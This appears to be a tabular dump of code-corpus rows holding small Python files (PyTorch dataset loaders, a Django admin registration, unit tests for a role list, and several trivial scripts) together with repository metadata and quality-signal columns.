hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e35b116b97108ae07fbadd2426002db1f0dc787
| 54
|
py
|
Python
|
models/audio/vggish/__init__.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/audio/vggish/__init__.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/audio/vggish/__init__.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
from .vggish_custom_inference import extract_features
| 27
| 53
| 0.907407
| 7
| 54
| 6.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 54
| 1
| 54
| 54
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
2e49a9d1ef77d6ec94750aab360efea0a66b0304
| 159
|
py
|
Python
|
neuronlp/__init__.py
|
XuezheMax/NeuroNLP
|
0098d876584c1dcef0b46478a5ced7affd089d78
|
[
"MIT"
] | 16
|
2015-11-22T19:03:12.000Z
|
2019-06-20T03:59:22.000Z
|
neuronlp/__init__.py
|
XuezheMax/NeuroNLP
|
0098d876584c1dcef0b46478a5ced7affd089d78
|
[
"MIT"
] | 1
|
2017-06-18T08:58:23.000Z
|
2017-06-22T13:49:10.000Z
|
neuronlp/__init__.py
|
XuezheMax/NeuroNLP
|
0098d876584c1dcef0b46478a5ced7affd089d78
|
[
"MIT"
] | 5
|
2017-03-13T13:44:54.000Z
|
2018-07-17T04:23:00.000Z
|
__author__ = 'max'
from . import utils
from . import objectives
from . import layers
from . import io
from . import regularizations
__version__ = "0.1.dev1"
| 15.9
| 29
| 0.742138
| 21
| 159
| 5.238095
| 0.619048
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022901
| 0.176101
| 159
| 9
| 30
| 17.666667
| 0.816794
| 0
| 0
| 0
| 0
| 0
| 0.069182
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.714286
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5cf258ff9df9ea7494e86ce14f4b7246197af9c2
| 50
|
py
|
Python
|
codes/a_config/_rl_parameters/on_policy/parameter_on_policy.py
|
linklab/link_rl
|
e3d3196dcd49fd71b45941e07fc0d8a27d1d8c99
|
[
"MIT"
] | null | null | null |
codes/a_config/_rl_parameters/on_policy/parameter_on_policy.py
|
linklab/link_rl
|
e3d3196dcd49fd71b45941e07fc0d8a27d1d8c99
|
[
"MIT"
] | null | null | null |
codes/a_config/_rl_parameters/on_policy/parameter_on_policy.py
|
linklab/link_rl
|
e3d3196dcd49fd71b45941e07fc0d8a27d1d8c99
|
[
"MIT"
] | 1
|
2021-11-23T12:30:37.000Z
|
2021-11-23T12:30:37.000Z
|
import enum
class PARAMETERS_ON_POLICY:
pass
| 10
| 27
| 0.78
| 7
| 50
| 5.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 50
| 5
| 28
| 10
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
cf0114b4298d650667715505c6dbef78dcc811ba
| 97
|
py
|
Python
|
mainapp/admin.py
|
H0oxy/exeam21.07.03
|
340bbc179ef796e30b1868276a9c886164c03db4
|
[
"MIT"
] | null | null | null |
mainapp/admin.py
|
H0oxy/exeam21.07.03
|
340bbc179ef796e30b1868276a9c886164c03db4
|
[
"MIT"
] | null | null | null |
mainapp/admin.py
|
H0oxy/exeam21.07.03
|
340bbc179ef796e30b1868276a9c886164c03db4
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from mainapp.models import Colors
admin.site.register(Colors)
| 16.166667
| 33
| 0.824742
| 14
| 97
| 5.714286
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113402
| 97
| 5
| 34
| 19.4
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
cf06651c3b90d5c4bcfe8881cf59379ff0f59544
| 157
|
py
|
Python
|
general/resources/example_logging.py
|
Transrian/bd71-courses
|
b7e145eeb394354d0a49ce85fec752fa894e2fd3
|
[
"MIT"
] | null | null | null |
general/resources/example_logging.py
|
Transrian/bd71-courses
|
b7e145eeb394354d0a49ce85fec752fa894e2fd3
|
[
"MIT"
] | null | null | null |
general/resources/example_logging.py
|
Transrian/bd71-courses
|
b7e145eeb394354d0a49ce85fec752fa894e2fd3
|
[
"MIT"
] | null | null | null |
import logging
logging.basicConfig(format="%(asctime)s - %(name)s - %(process)d - %(filename)s - %(levelname)s - %(message)s")
logging.warn("Hello World!")
| 31.4
| 111
| 0.675159
| 21
| 157
| 5.047619
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101911
| 157
| 5
| 112
| 31.4
| 0.751773
| 0
| 0
| 0
| 0
| 0.333333
| 0.588608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
cf1da4e7892237fc58be118a079ae0a3fe062389
| 94
|
py
|
Python
|
main.py
|
LordBayron94/Extractive-Summarisation-of-German-Wikipedia
|
7a75d6d1ea9b66b9366467ebdad21051ff22b1e1
|
[
"MIT"
] | null | null | null |
main.py
|
LordBayron94/Extractive-Summarisation-of-German-Wikipedia
|
7a75d6d1ea9b66b9366467ebdad21051ff22b1e1
|
[
"MIT"
] | null | null | null |
main.py
|
LordBayron94/Extractive-Summarisation-of-German-Wikipedia
|
7a75d6d1ea9b66b9366467ebdad21051ff22b1e1
|
[
"MIT"
] | null | null | null |
import pandas as pd, numpy as np, os, sys
print('Hello world')
print('this is another test')
| 18.8
| 41
| 0.712766
| 17
| 94
| 3.941176
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 94
| 4
| 42
| 23.5
| 0.858974
| 0
| 0
| 0
| 0
| 0
| 0.329787
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
cf41e5970aa5ae104106446cef3af5594e60b7aa
| 269
|
py
|
Python
|
optimistic.py
|
aman-tiwari/searchsound
|
c15b594df4cc2ad5e1d428bc88905c88b167fef4
|
[
"CC-BY-3.0"
] | 1
|
2019-03-01T08:54:09.000Z
|
2019-03-01T08:54:09.000Z
|
optimistic.py
|
aman-tiwari/searchsound
|
c15b594df4cc2ad5e1d428bc88905c88b167fef4
|
[
"CC-BY-3.0"
] | 1
|
2015-01-11T18:31:18.000Z
|
2015-01-12T22:55:33.000Z
|
optimistic.py
|
aman-tiwari/searchsound
|
c15b594df4cc2ad5e1d428bc88905c88b167fef4
|
[
"CC-BY-3.0"
] | null | null | null |
class OptimisticDict(dict):
def __init__(self, factory_func):
self.factory_func = factory_func
super(OptimisticDict, self).__init__()
def __missing__(self, key):
self[key] = self.factory_func(key)
return self.factory_func(key)
| 26.9
| 46
| 0.672862
| 32
| 269
| 5.125
| 0.375
| 0.335366
| 0.365854
| 0.219512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.223048
| 269
| 9
| 47
| 29.888889
| 0.784689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
cf66e68ffed31665aac62982dddef5ddbb7b8c1b
| 7,102
|
py
|
Python
|
datasets.py
|
tungnd1705/PC3-pytorch
|
e1ed5f475da387cb92dd1e3830e7d195562b4b64
|
[
"MIT"
] | 61
|
2019-12-08T10:10:48.000Z
|
2021-04-14T14:26:13.000Z
|
datasets.py
|
tungnd1705/PC3-pytorch
|
e1ed5f475da387cb92dd1e3830e7d195562b4b64
|
[
"MIT"
] | 1
|
2019-12-19T19:10:53.000Z
|
2019-12-19T19:10:53.000Z
|
datasets.py
|
tungnd1705/PC3-pytorch
|
e1ed5f475da387cb92dd1e3830e7d195562b4b64
|
[
"MIT"
] | 14
|
2019-12-14T06:36:37.000Z
|
2021-11-27T15:19:55.000Z
|
import os
from os import path
import numpy as np
import torch
from data import sample_planar, sample_pole
from torch.utils.data import Dataset
torch.set_default_dtype(torch.float64)
class BaseDataset(Dataset):
def __init__(self, data_path, sample_size, noise):
self.sample_size = sample_size
self.noise = noise
self.data_path = data_path
if not os.path.exists(self.data_path):
os.makedirs(self.data_path)
self._process()
self.data_x, self.data_u, self.data_x_next = torch.load(
self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise)
)
def __len__(self):
return len(self.data_x)
def __getitem__(self, index):
return self.data_x[index], self.data_u[index], self.data_x_next[index]
def _process_image(self, img):
pass
def check_exists(self):
return path.exists(self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise))
def _process(self):
pass
class PlanarDataset(BaseDataset):
width = 40
height = 40
action_dim = 2
def __init__(self, sample_size, noise):
data_path = "data/planar/"
super(PlanarDataset, self).__init__(data_path, sample_size, noise)
def _process_image(self, img):
return torch.from_numpy(img.flatten()).unsqueeze(0)
def _process(self):
if self.check_exists():
return
else:
(
x_numpy_data,
u_numpy_data,
x_next_numpy_data,
state_numpy_data,
state_next_numpy_data,
) = sample_planar.sample(sample_size=self.sample_size, noise=self.noise)
data_len = len(x_numpy_data)
# place holder for data
data_x = torch.zeros(data_len, self.width * self.height)
data_u = torch.zeros(data_len, self.action_dim)
data_x_next = torch.zeros(data_len, self.width * self.height)
for i in range(data_len):
data_x[i] = self._process_image(x_numpy_data[i])
data_u[i] = torch.from_numpy(u_numpy_data[i])
data_x_next[i] = self._process_image(x_next_numpy_data[i])
data_set = (data_x, data_u, data_x_next)
with open(self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise), "wb") as f:
torch.save(data_set, f)
class PendulumDataset(BaseDataset):
width = 48
height = 48 * 2
action_dim = 1
def __init__(self, sample_size, noise):
data_path = "data/pendulum/"
super(PendulumDataset, self).__init__(data_path, sample_size, noise)
def _process_image(self, img):
x = np.vstack((img[:, :, 0], img[:, :, 1])).flatten()
return torch.from_numpy(x).unsqueeze(0)
def _process(self):
if self.check_exists():
return
else:
(
x_numpy_data,
u_numpy_data,
x_next_numpy_data,
state_numpy_data,
state_next_numpy_data,
) = sample_pole.sample(env_name="pendulum", sample_size=self.sample_size, noise=self.noise)
data_len = len(x_numpy_data)
# place holder for data
data_x = torch.zeros(data_len, self.width * self.height)
data_u = torch.zeros(data_len, self.action_dim)
data_x_next = torch.zeros(data_len, self.width * self.height)
for i in range(data_len):
data_x[i] = self._process_image(x_numpy_data[i])
data_u[i] = torch.from_numpy(u_numpy_data[i])
data_x_next[i] = self._process_image(x_next_numpy_data[i])
data_set = (data_x, data_u, data_x_next)
with open(self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise), "wb") as f:
torch.save(data_set, f)
class CartPoleDataset(BaseDataset):
width = 80
height = 80 * 2
action_dim = 1
def __init__(self, sample_size, noise):
data_path = "data/cartpole/"
super(CartPoleDataset, self).__init__(data_path, sample_size, noise)
def _process_image(self, img):
x = torch.zeros(size=(2, self.width, self.width))
x[0, :, :] = torch.from_numpy(img[:, :, 0])
x[1, :, :] = torch.from_numpy(img[:, :, 1])
return x.unsqueeze(0)
def _process(self):
if self.check_exists():
return
else:
(
x_numpy_data,
u_numpy_data,
x_next_numpy_data,
state_numpy_data,
state_next_numpy_data,
) = sample_pole.sample(env_name="cartpole", sample_size=self.sample_size, noise=self.noise)
data_len = len(x_numpy_data)
# place holder for data
data_x = torch.zeros(data_len, 2, self.width, self.width)
data_u = torch.zeros(data_len, self.action_dim)
data_x_next = torch.zeros(data_len, 2, self.width, self.width)
for i in range(data_len):
data_x[i] = self._process_image(x_numpy_data[i])
data_u[i] = torch.from_numpy(u_numpy_data[i])
data_x_next[i] = self._process_image(x_next_numpy_data[i])
data_set = (data_x, data_u, data_x_next)
with open(self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise), "wb") as f:
torch.save(data_set, f)
class ThreePoleDataset(BaseDataset):
width = 80
height = 80 * 2
action_dim = 3
def __init__(self, sample_size, noise):
data_path = "data/threepole/"
super(ThreePoleDataset, self).__init__(data_path, sample_size, noise)
def _process_image(self, img):
x = torch.zeros(size=(2, self.width, self.width))
x[0, :, :] = torch.from_numpy(img[:, :, 0])
x[1, :, :] = torch.from_numpy(img[:, :, 1])
return x.unsqueeze(0)
def _process(self):
if self.check_exists():
return
else:
(
x_numpy_data,
u_numpy_data,
x_next_numpy_data,
state_numpy_data,
state_next_numpy_data,
) = sample_pole.sample(env_name="threepole", sample_size=self.sample_size, noise=self.noise)
data_len = len(x_numpy_data)
# place holder for data
data_x = torch.zeros(data_len, 2, self.width, self.width)
data_u = torch.zeros(data_len, self.action_dim)
data_x_next = torch.zeros(data_len, 2, self.width, self.width)
for i in range(data_len):
data_x[i] = self._process_image(x_numpy_data[i])
data_u[i] = torch.from_numpy(u_numpy_data[i])
data_x_next[i] = self._process_image(x_next_numpy_data[i])
data_set = (data_x, data_u, data_x_next)
with open(self.data_path + "{:d}_{:.0f}.pt".format(self.sample_size, self.noise), "wb") as f:
torch.save(data_set, f)
| 33.819048
| 105
| 0.587018
| 962
| 7,102
| 3.991684
| 0.087318
| 0.084375
| 0.042188
| 0.053125
| 0.789844
| 0.769792
| 0.769792
| 0.769792
| 0.753646
| 0.733854
| 0
| 0.010235
| 0.298367
| 7,102
| 209
| 106
| 33.980861
| 0.760385
| 0.01225
| 0
| 0.666667
| 0
| 0
| 0.024536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113208
| false
| 0.012579
| 0.037736
| 0.025157
| 0.327044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d842019b46c2d35f07e814c91cb8e9b3e4b6fc36
| 124
|
py
|
Python
|
models/__init__.py
|
longrootchen/cifar100-pytorch
|
5d85ec34c2eb30d3619d3b7cf5b558c0234333b1
|
[
"MIT"
] | 2
|
2020-09-25T08:09:44.000Z
|
2020-09-29T07:27:07.000Z
|
models/__init__.py
|
longrootchen/cifar100-pytorch
|
5d85ec34c2eb30d3619d3b7cf5b558c0234333b1
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
longrootchen/cifar100-pytorch
|
5d85ec34c2eb30d3619d3b7cf5b558c0234333b1
|
[
"MIT"
] | null | null | null |
# -*-coding:utf-8-*-
from .resnext import *
def get_model(config):
return globals()[config.arch](config.num_classes)
| 15.5
| 53
| 0.685484
| 17
| 124
| 4.882353
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009346
| 0.137097
| 124
| 7
| 54
| 17.714286
| 0.766355
| 0.145161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 5
|
d85fe6992d00d9dadfba53f9bfa8510afcf680ca
| 161
|
py
|
Python
|
Exercise 1.py
|
BernardoBeiriz/Cryptography
|
4b18f83ce3b8e403188362904cadb0b584507ef1
|
[
"MIT"
] | null | null | null |
Exercise 1.py
|
BernardoBeiriz/Cryptography
|
4b18f83ce3b8e403188362904cadb0b584507ef1
|
[
"MIT"
] | null | null | null |
Exercise 1.py
|
BernardoBeiriz/Cryptography
|
4b18f83ce3b8e403188362904cadb0b584507ef1
|
[
"MIT"
] | null | null | null |
pares = input()
for i in range (0, pares):
a, b = input()
print("%d %d %d %d %d" % ((a+b), (a-b), (a*b), (a//b), (a%b)))
print("---")
| 17.888889
| 67
| 0.36646
| 28
| 161
| 2.107143
| 0.392857
| 0.20339
| 0.20339
| 0.271186
| 0.169492
| 0.169492
| 0.169492
| 0.169492
| 0
| 0
| 0
| 0.009174
| 0.322981
| 161
| 8
| 68
| 20.125
| 0.53211
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d86aee2b168477305f473d7f6f97c02b26c40a91
| 5,042
|
py
|
Python
|
Tests/test_Roles.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Tests/test_Roles.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
Tests/test_Roles.py
|
ergoregion/Rota-Program
|
44dab4cb11add184619d88aa0fcab61532d128e6
|
[
"MIT"
] | null | null | null |
__author__ = 'Neil Butcher'
import unittest
from Rota_System import Roles
class RoleTest(unittest.TestCase):
def setUp(self):
Roles.GlobalRoleList.clear()
Roles.GlobalRoleList.add_role(Roles.Role('Baker', 'B', 10))
Roles.GlobalRoleList.add_role(Roles.Role('Steward', 'S', 9))
Roles.GlobalRoleList.add_role(Roles.Role('Fisherman', 'F', 7))
def tearDown(self):
Roles.GlobalRoleList.clear()
def testOuterCreation(self):
baker = Roles.role_from_code('B')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
baker = Roles.role('B')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
baker = Roles.role('Baker')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
def testCreation(self):
baker = Roles.role('B')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
def testListCreation(self):
roles = Roles.RoleList()
roles.all()
baker = roles.role_from_code('B')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
baker = roles.role_from_code('B ')
self.assertEqual(baker.code, 'B')
self.assertEqual(baker.description, 'Baker')
def testListInitCreation(self):
roles = Roles.RoleList('B')
self.assertEqual(len(roles.roles), 1, 'should be a role already')
def testLookup(self):
roles = Roles.RoleList()
roles.all()
self.assertTrue(roles.includes('S'), 'All roles should include steward')
self.assertTrue(roles.includes('B'), 'All roles should include baker')
self.assertTrue(roles.includes(Roles.role('B')), 'All roles should include baker as class')
self.assertTrue(roles.includes('S '), 'All roles should include steward')
def testSinglePopulatedList(self):
roles = Roles.RoleList()
roles.populate_from_codes('S')
self.assertFalse(roles.includes('B'), 'this list should not include baker')
self.assertTrue(roles.includes(Roles.role('S')), 'This list should include steward')
self.assertTrue(roles.includes('S '), 'This list should include steward')
def testSingleAddedList(self):
roles = Roles.RoleList()
roles.add_code('S')
self.assertFalse(roles.includes('B'), 'this list should not include baker')
self.assertTrue(roles.includes(Roles.role('S')), 'This list should include steward')
self.assertTrue(roles.includes('S '), 'This list should include steward')
self.assertEqual(roles.number_of_roles(), 1)
roles.add_code('S')
self.assertEqual(roles.number_of_roles(), 1)
roles.add_code('B')
self.assertEqual(roles.number_of_roles(), 2)
def testMultiPopulatedList(self):
roles = Roles.RoleList()
roles.populate_from_codes('F S')
self.assertFalse(roles.includes('B'), 'this list should not include baker')
self.assertTrue(roles.includes(Roles.role('Steward')), 'This list should include steward')
self.assertTrue(roles.includes(Roles.role('F')), 'This list should also include fisherman')
def testMultiAddedList(self):
roles = Roles.RoleList()
roles.add_code('S')
self.assertEqual(roles.number_of_roles(), 1)
roles.add_code('F')
roles.add_code('S')
self.assertEqual(roles.number_of_roles(), 2)
self.assertFalse(roles.includes('B'), 'this list should not include baker')
self.assertTrue(roles.includes(Roles.role('S')), 'This list should include steward')
self.assertTrue(roles.includes(Roles.role('Fisherman')), 'This list should also include fisherman')
def testRemovingList(self):
roles = Roles.RoleList()
roles.add_code('S')
self.assertEqual(roles.number_of_roles(), 1)
roles.remove_code('S')
roles.remove_code('F')
self.assertEqual(roles.number_of_roles(), 0)
roles.add_code(' S')
roles.add_code('F ')
self.assertEqual(roles.number_of_roles(), 2)
roles.remove_code('S')
roles.remove_code('B')
self.assertEqual(roles.number_of_roles(), 1)
roles.add_code('S')
roles.add_code('B')
self.assertEqual(roles.number_of_roles(), 3)
def testOutputList(self):
roles = Roles.RoleList()
roles.populate_from_codes('F S')
self.assertTrue('F' in roles.list_of_codes().split())
self.assertTrue('S' in roles.list_of_codes().split())
self.assertFalse('B' in roles.list_of_codes().split())
roles.all()
self.assertTrue('F' in roles.list_of_codes().split())
self.assertTrue('S' in roles.list_of_codes().split())
self.assertTrue('B' in roles.list_of_codes().split())
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 40.99187
| 107
| 0.643594
| 615
| 5,042
| 5.154472
| 0.125203
| 0.108833
| 0.07571
| 0.07571
| 0.818927
| 0.818927
| 0.753628
| 0.683596
| 0.625868
| 0.615142
| 0
| 0.00379
| 0.214994
| 5,042
| 123
| 108
| 40.99187
| 0.79712
| 0.008528
| 0
| 0.638095
| 0
| 0
| 0.146259
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.12381
| false
| 0
| 0.019048
| 0
| 0.152381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
